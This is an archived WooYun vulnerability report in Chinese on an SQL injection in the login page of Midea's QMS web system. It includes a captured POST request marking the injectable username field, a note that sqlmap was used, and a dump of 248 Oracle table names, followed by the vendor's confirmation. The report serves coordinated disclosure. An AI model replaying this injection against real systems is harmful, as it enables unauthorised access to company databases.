乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-07: 细节已通知厂商并且等待厂商处理中 2015-10-07: 厂商已经确认,细节仅向厂商公开 2015-10-17: 细节向核心白帽子及相关领域专家公开 2015-10-27: 细节向普通白帽子公开 2015-11-06: 细节向实习白帽子公开 2015-11-21: 细节向公众公开
SQL注入漏洞
初看 http://qms.midea.com.cn/ 登录框没有什么问题,也不想爆破
但是发现链接 http://qms.midea.com.cn/CE/default.aspx 与上面的系统一样
很明显,后端数据库类型为:Oracle登录过程进行抓包
POST /CE/default.aspx HTTP/1.1Host: qms.midea.com.cnProxy-Connection: keep-aliveContent-Length: 250Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://qms.midea.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://qms.midea.com.cn/CE/default.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2Cookie: ASP.NET_SessionId=uc5ues45xgqzgq2zjqk045vm__VIEWSTATE=%2FwEPDwULLTEyODkwNjgzOTMPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BSfor6XnlKjmiLfkuI3lrZjlnKjmiJbogIXlr4bnoIHplJnor6%2FvvIFkZGTudlv6iFY8jWXoEVrL4hLt%2FZp3Jg%3D%3D&DDL_ZZ=2149&TextBoxUserName=admin*&TextBoxPassword=admin&ButtonLogin=%E7%99%BB+%E5%BD%95
使用sqlmap直接跑数据:
全部数据库名称:
获取当前数据库名称:
列出当前库的全部数据表:
Database: QMSCEADMIN[248 tables]+--------------------------------+| AA || BASE_ALLOW_VENDOR_LIST || BASE_ERP_TO_QMS_ITEMS || BASE_ERP_TO_QMS_VENDORS_INFO || CE_IQC_QUOTA_UPDATE || CE_OQC_FUNC_REP || CE_OQC_SIGNAL || CE_OQC_WENSHE || CP_UPDATE_APLLYLIST_LOG || CTQ_ITEM_MANAGE || CTQ_SPECTFICATIONS || CTXSYS_DATABASE_USERS || CTXSYS_MODULE_DATABASE || CTXSYS_SYSTEM_STRUCTURE || CTXSYS_SYSTEM_USERNAMEMATCH || CTXSYS_SYSTEM_USERS || CTX_WORK_FLOW_EMAIL || EARLY_PRODUCT_REPORT_QUERY || ERP_W_QMS_SCRAP || IQC00_ASSORTMENT || IQC00_ASSORTMENT_BAK || IQC00_BASE_APLLYLIST || IQC00_BASE_APLLYLIST_1 || IQC00_BASE_MATERIAL_SHOTNAME || IQC00_DEFECT_ASSORTMENT || IQC01_INSPECT_LPNNUMBER || IQC01_INSPECT_MIDEA || IQC01_INSPECT_MIDEA01 || IQC01_INSPECT_MIDEA01_LOG || IQC01_INSPECT_MIDEA_ITEMA || IQC01_INSPECT_VENDOR || IQC01_INSPECT_VENDOR_ITEMA || IQC02_ACRE_MIDEA || IQC02_ORIG_INSPECT || IQC02_SAMPLESTANDARD || IQC02_SWATCHLETTER || IQC04_SPEC02_ITEMS || IQC_8D_AUDIT_ITEM || IQC_8D_CHECK_ITEM || IQC_8D_INSPECTION_ITEM || IQC_8D_INSPECTION_REPORT || IQC_BASE_APLLYLIST_DEL_LOG || IQC_CUSTOMER_COMPLAINTS || IQC_EAELY_INSPECT_ORIG_M || IQC_EARLY_INSPECT || IQC_EARLY_INSPECT_LOG || IQC_EARLY_RECORD || IQC_EXCEPTION_INFORMATION || IQC_GYS_WORKFLOW || IQC_INSPECTION || IQC_INSPECT_ITEM || IQC_INSPECT_ITEM_D || IQC_INSPECT_MOP_LIST || IQC_INSPECT_ORIG_M || IQC_INSPECT_ORIG_MOP || IQC_INSPECT_ORIG_M_LOG || IQC_KEY3_REVIEW_REC || IQC_LOSS_RECORD || IQC_MAIN_WORKFLOW || IQC_MONTH_PLAN || IQC_ORT_MONTH_PLAN || IQC_ORT_TYPE_RECORD || IQC_ORT_TYPE_TEST || IQC_PART_BASIS_MESSAGE || IQC_PART_BASIS_MESSAGE1 || IQC_PART_BASIS_MESSAGE_LOG || IQC_PART_MESSAGE_DEL_LOG || IQC_PRD10_MATERAIL_REJECT || IQC_ROHS_WORKFLOW || IQC_SAMPLESHIFT || IQC_SCREEN_INSPECTION || IQC_SCREEN_LIST || IQC_SPECIAL_PROCURE || IQC_TEST_MAINTAIN || IQC_TEST_REPORT || IQC_TEST_REPORT_DROP || IQC_TEST_WORKFLOW || IQC_TO_SCM_APLLYLIST_LOG || IQC_TR_SPECIFICATIONS || IQC_TYPE_RECORD || IQC_TYPE_TEST || IQC_UPDATA_SCM_LOG || IQC_VENDOR_MASTER_D || IQC_VENDOR_MASTER_M || IQC_XINGSHIWEITUO || IQC_XS_LIST || ITEM_UPDATE_LOG || OQC_TRIAL_PRO_INF_TABLES || PDM_TO_QMS_CPCECNDRAW_LOG || PDM_TO_QMS_CPCECNDRAW_M || PQC_BOM_CONTRAST || PQC_MATERAIL_REJECT || PUB_IQC00_INSPECT_MIDEA || QIS7_CAPABILITIES || QIS7_CERTIFICATES || QIS7_CLMINPUTCHARTS || QIS7_DATAEDITORS || QIS7_DATAIMIGRATES || QIS7_DOEANALYSIS || QIS7_EFFECTIVEINDEXES || QIS7_INPUTFORMS || QIS7_MACHINDATACAPTURE || QIS7_MANHATTANS || QIS7_MSANALYSIS || QIS7_MULTICHARTS || QIS7_PARETOCHARTS || QIS7_PERFERMANCES || QIS7_QUERIES || QIS7_REALTIMEINPUT || QIS7_REMOTEDATATRANSFER || QIS7_SCATTERS || QIS7_SCREENMONITOR || QIS7_SHEWHARTS || QIS7_SPECIALCERTIFICATES || QIS7_STATISMONITOR || QIS7_SYSMONITORS || QIS7_TRANSACTIONMANAGER || QIS7_VARIATIONS || QIS7_WORKFLOWMANAGER || QIS_SYSTEM_AUDITORS || QIS_SYSTEM_COMDATAEXPORT || QIS_SYSTEM_COMDATAFILTERS || QIS_SYSTEM_COMMDATATRANSFER || QIS_SYSTEM_COMPARAMETERS || QIS_SYSTEM_EMAILSERVERINFOR || QIS_SYSTEM_EXCEPTION || QIS_SYSTEM_EXCEPTVALUE || QIS_SYSTEM_EXTRACTDATA || QIS_SYSTEM_IBMMQDEFINITION || QIS_SYSTEM_IBMMQINPUTFORMS || QIS_SYSTEM_IBMMQMANAGER || QIS_SYSTEM_IBMMQMSGRESOLUTION || QIS_SYSTEM_IBMMQMSGRESTABLE || QIS_SYSTEM_RECSDATAFILTERS || QIS_SYSTEM_RECSTRANSFROMDB || QIS_SYSTEM_REPORTFILETYPE || QIS_SYSTEM_SAPRFCFUNCTIONS || QIS_SYSTEM_SAPRFCINTERFACE || QIS_SYSTEM_SAPRFCOPERCONFIRM || QIS_SYSTEM_SAPRFCPARAMVALUES || QIS_SYSTEM_SAPRFCQISOPERATION || QIS_SYSTEM_SAPROUTELOG || QIS_SYSTEM_SAPSVRINTERFACE || QIS_SYSTEM_SAPSVROPERCONFIRM || QIS_SYSTEM_SAPSVRPARAMVALUES || QIS_SYSTEM_SAPSVRQISOPERATION || QIS_SYSTEM_SAPUSERINFOR || QIS_SYSTEM_SENDMSGSTRUCTURE || QIS_SYSTEM_SENDMSGTEMPLATE || QIS_SYSTEM_WORKFLOWSERVERLOG || QIS_SYS_ARCHBATCHINTABLE || QIS_SYS_ARCHIVEKEYWORDS || QIS_SYS_AUTHAGENTNAME || QIS_SYS_BACKRECLOGTABLE || QIS_SYS_BACKUPDELETERECS || QIS_SYS_BARCODEPRINTPRM || QIS_SYS_BARCODEPRNPARAMETER || QIS_SYS_BARCODESTDPARAMETER || QIS_SYS_BAS00_BATCH_NO || QIS_SYS_BATCHBINCALLS || QIS_SYS_CHARTINPUTPICTURE || QIS_SYS_CHARTPOINTTRACE || QIS_SYS_CHOICELISTS || QIS_SYS_CLMINPUTCHARTS || QIS_SYS_COMPONENTTABLE || QIS_SYS_COMTRANSACTIONRECOUT || QIS_SYS_COMTRANSINPUTFORM || QIS_SYS_COMTRANSRELATION || QIS_SYS_COMTRANSSRVLOGTABLE || QIS_SYS_DBRECSSRVLOGTABLE || QIS_SYS_DBWEBSRVLOGTABLE || QIS_SYS_DOCUMENTATIONSPECS || QIS_SYS_DYNAMICDLLFORMS || QIS_SYS_DYNAMICDLLPARAMS || QIS_SYS_EMAILADDRESSMANAGER || QIS_SYS_EXPERTCOMMENTS || QIS_SYS_FLOWTRANSACTIONS || QIS_SYS_FORMMODIFICATION || QIS_SYS_FORMTABLEVIEW || QIS_SYS_GROUPFIELDNAME || QIS_SYS_IBMMQSRVLOGTABLE || QIS_SYS_IMIGRATEPARAMS || QIS_SYS_INDEXKEYS || QIS_SYS_LANGUAGETABLE || QIS_SYS_LIMITEDUSERTABLE || QIS_SYS_LOTUSNOTESINFOR || QIS_SYS_MANIPULATEOUTOFRECS || QIS_SYS_ONLINEIDLETIME || QIS_SYS_ONLINEUSELIST || QIS_SYS_POPUPINPUTFORMLIST || QIS_SYS_PRODLINEPARAMETER || QIS_SYS_PRODLINESTOPCONTROL || QIS_SYS_PRODLINESTOPDIRECT || QIS_SYS_REALTIMEMONITOR || QIS_SYS_RECFILTERCONSTS || QIS_SYS_RELATEDFORMVALUE || QIS_SYS_RELATEDSPECKEYITEMS || QIS_SYS_RS232DATATRANSLOG || QIS_SYS_RS232PARAMETERS || QIS_SYS_SAPAUTODECISION || QIS_SYS_SAPAUTODECISIONLOGO || QIS_SYS_SAPCALLWEBSERVICE || QIS_SYS_SCREENDISPLAYTEXT || QIS_SYS_SHAREDDIRECTORY || QIS_SYS_SPECIFICATIONS || QIS_SYS_STATISVIEWTABLE || QIS_SYS_STATSTRANSACTION || QIS_SYS_SUBTEMPLETES || QIS_SYS_SYSTEMITEMTABLE || QIS_SYS_TABLEDEFINITION || QIS_SYS_TABLERELATIONS || QIS_SYS_TABLESPECKEYFIELDS || QIS_SYS_TECHNICALGUIDES || QIS_SYS_TRANSACTIONAGENT || QIS_SYS_TRANSACTIONFLOWBACKUP || QIS_SYS_TRANSACTIONFLOWMANAGER || QIS_SYS_TRANSACTIONFLOWTRASH || QIS_SYS_TRANSCYCLETIME || QIS_SYS_URLCONFIGURATION || QIS_SYS_WEBDATABINDINTERFACE || QIS_SYS_WEBDATACERTINTERFACE || QIS_SYS_WEBDATAINTABLES || QIS_SYS_WEBDATAINTERFACE || QIS_SYS_WEBDATAOUTTABLES || QIS_SYS_WEBPAGENAMES || QIS_SYS_WEBQMSCALLBATCH || QIS_SYS_WEBQMSCALLTABLE || QIS_SYS_WEBSERVEMETHOD || QIS_SYS_WEBSRVCALLDATASET || QIS_SYS_WEBSRVCALLMETHOD || QIS_SYS_WEBSRVCALLPROPERTY || QIS_SYS_WEBSRVCALLTABLE || QIS_SYS_WEBSVAPPBATCH || QIS_SYS_WEBSVQMSDATASETDEF || QIS_SYS_WEBSVQMSDEFINITION || QIS_SYS_WORKFLOWTRANSACTIONS || QIS_SYS_WORKTRANSFERATION || QMS_ORG || SCM_PO_CHECK_LOG || SRM_TO_QMS_WRITE_BACK || SYS_MAIL_LOG || SYS_MAIL_TASK || T || TEST_TABLE || TEST_WORD_LIN || VENDOR_MATE || YLG_ZL_BLL || YLG_ZL_KB |+--------------------------------+
漏洞证明即可,不再深入。
危害等级:中
漏洞Rank:8
确认时间:2015-10-07 19:32
感谢乌云最厉害的白帽子@路人甲的提醒,我们召唤应用管理员进行修改。顺便问一句:路人甲你RANK那么高有什么用...
暂无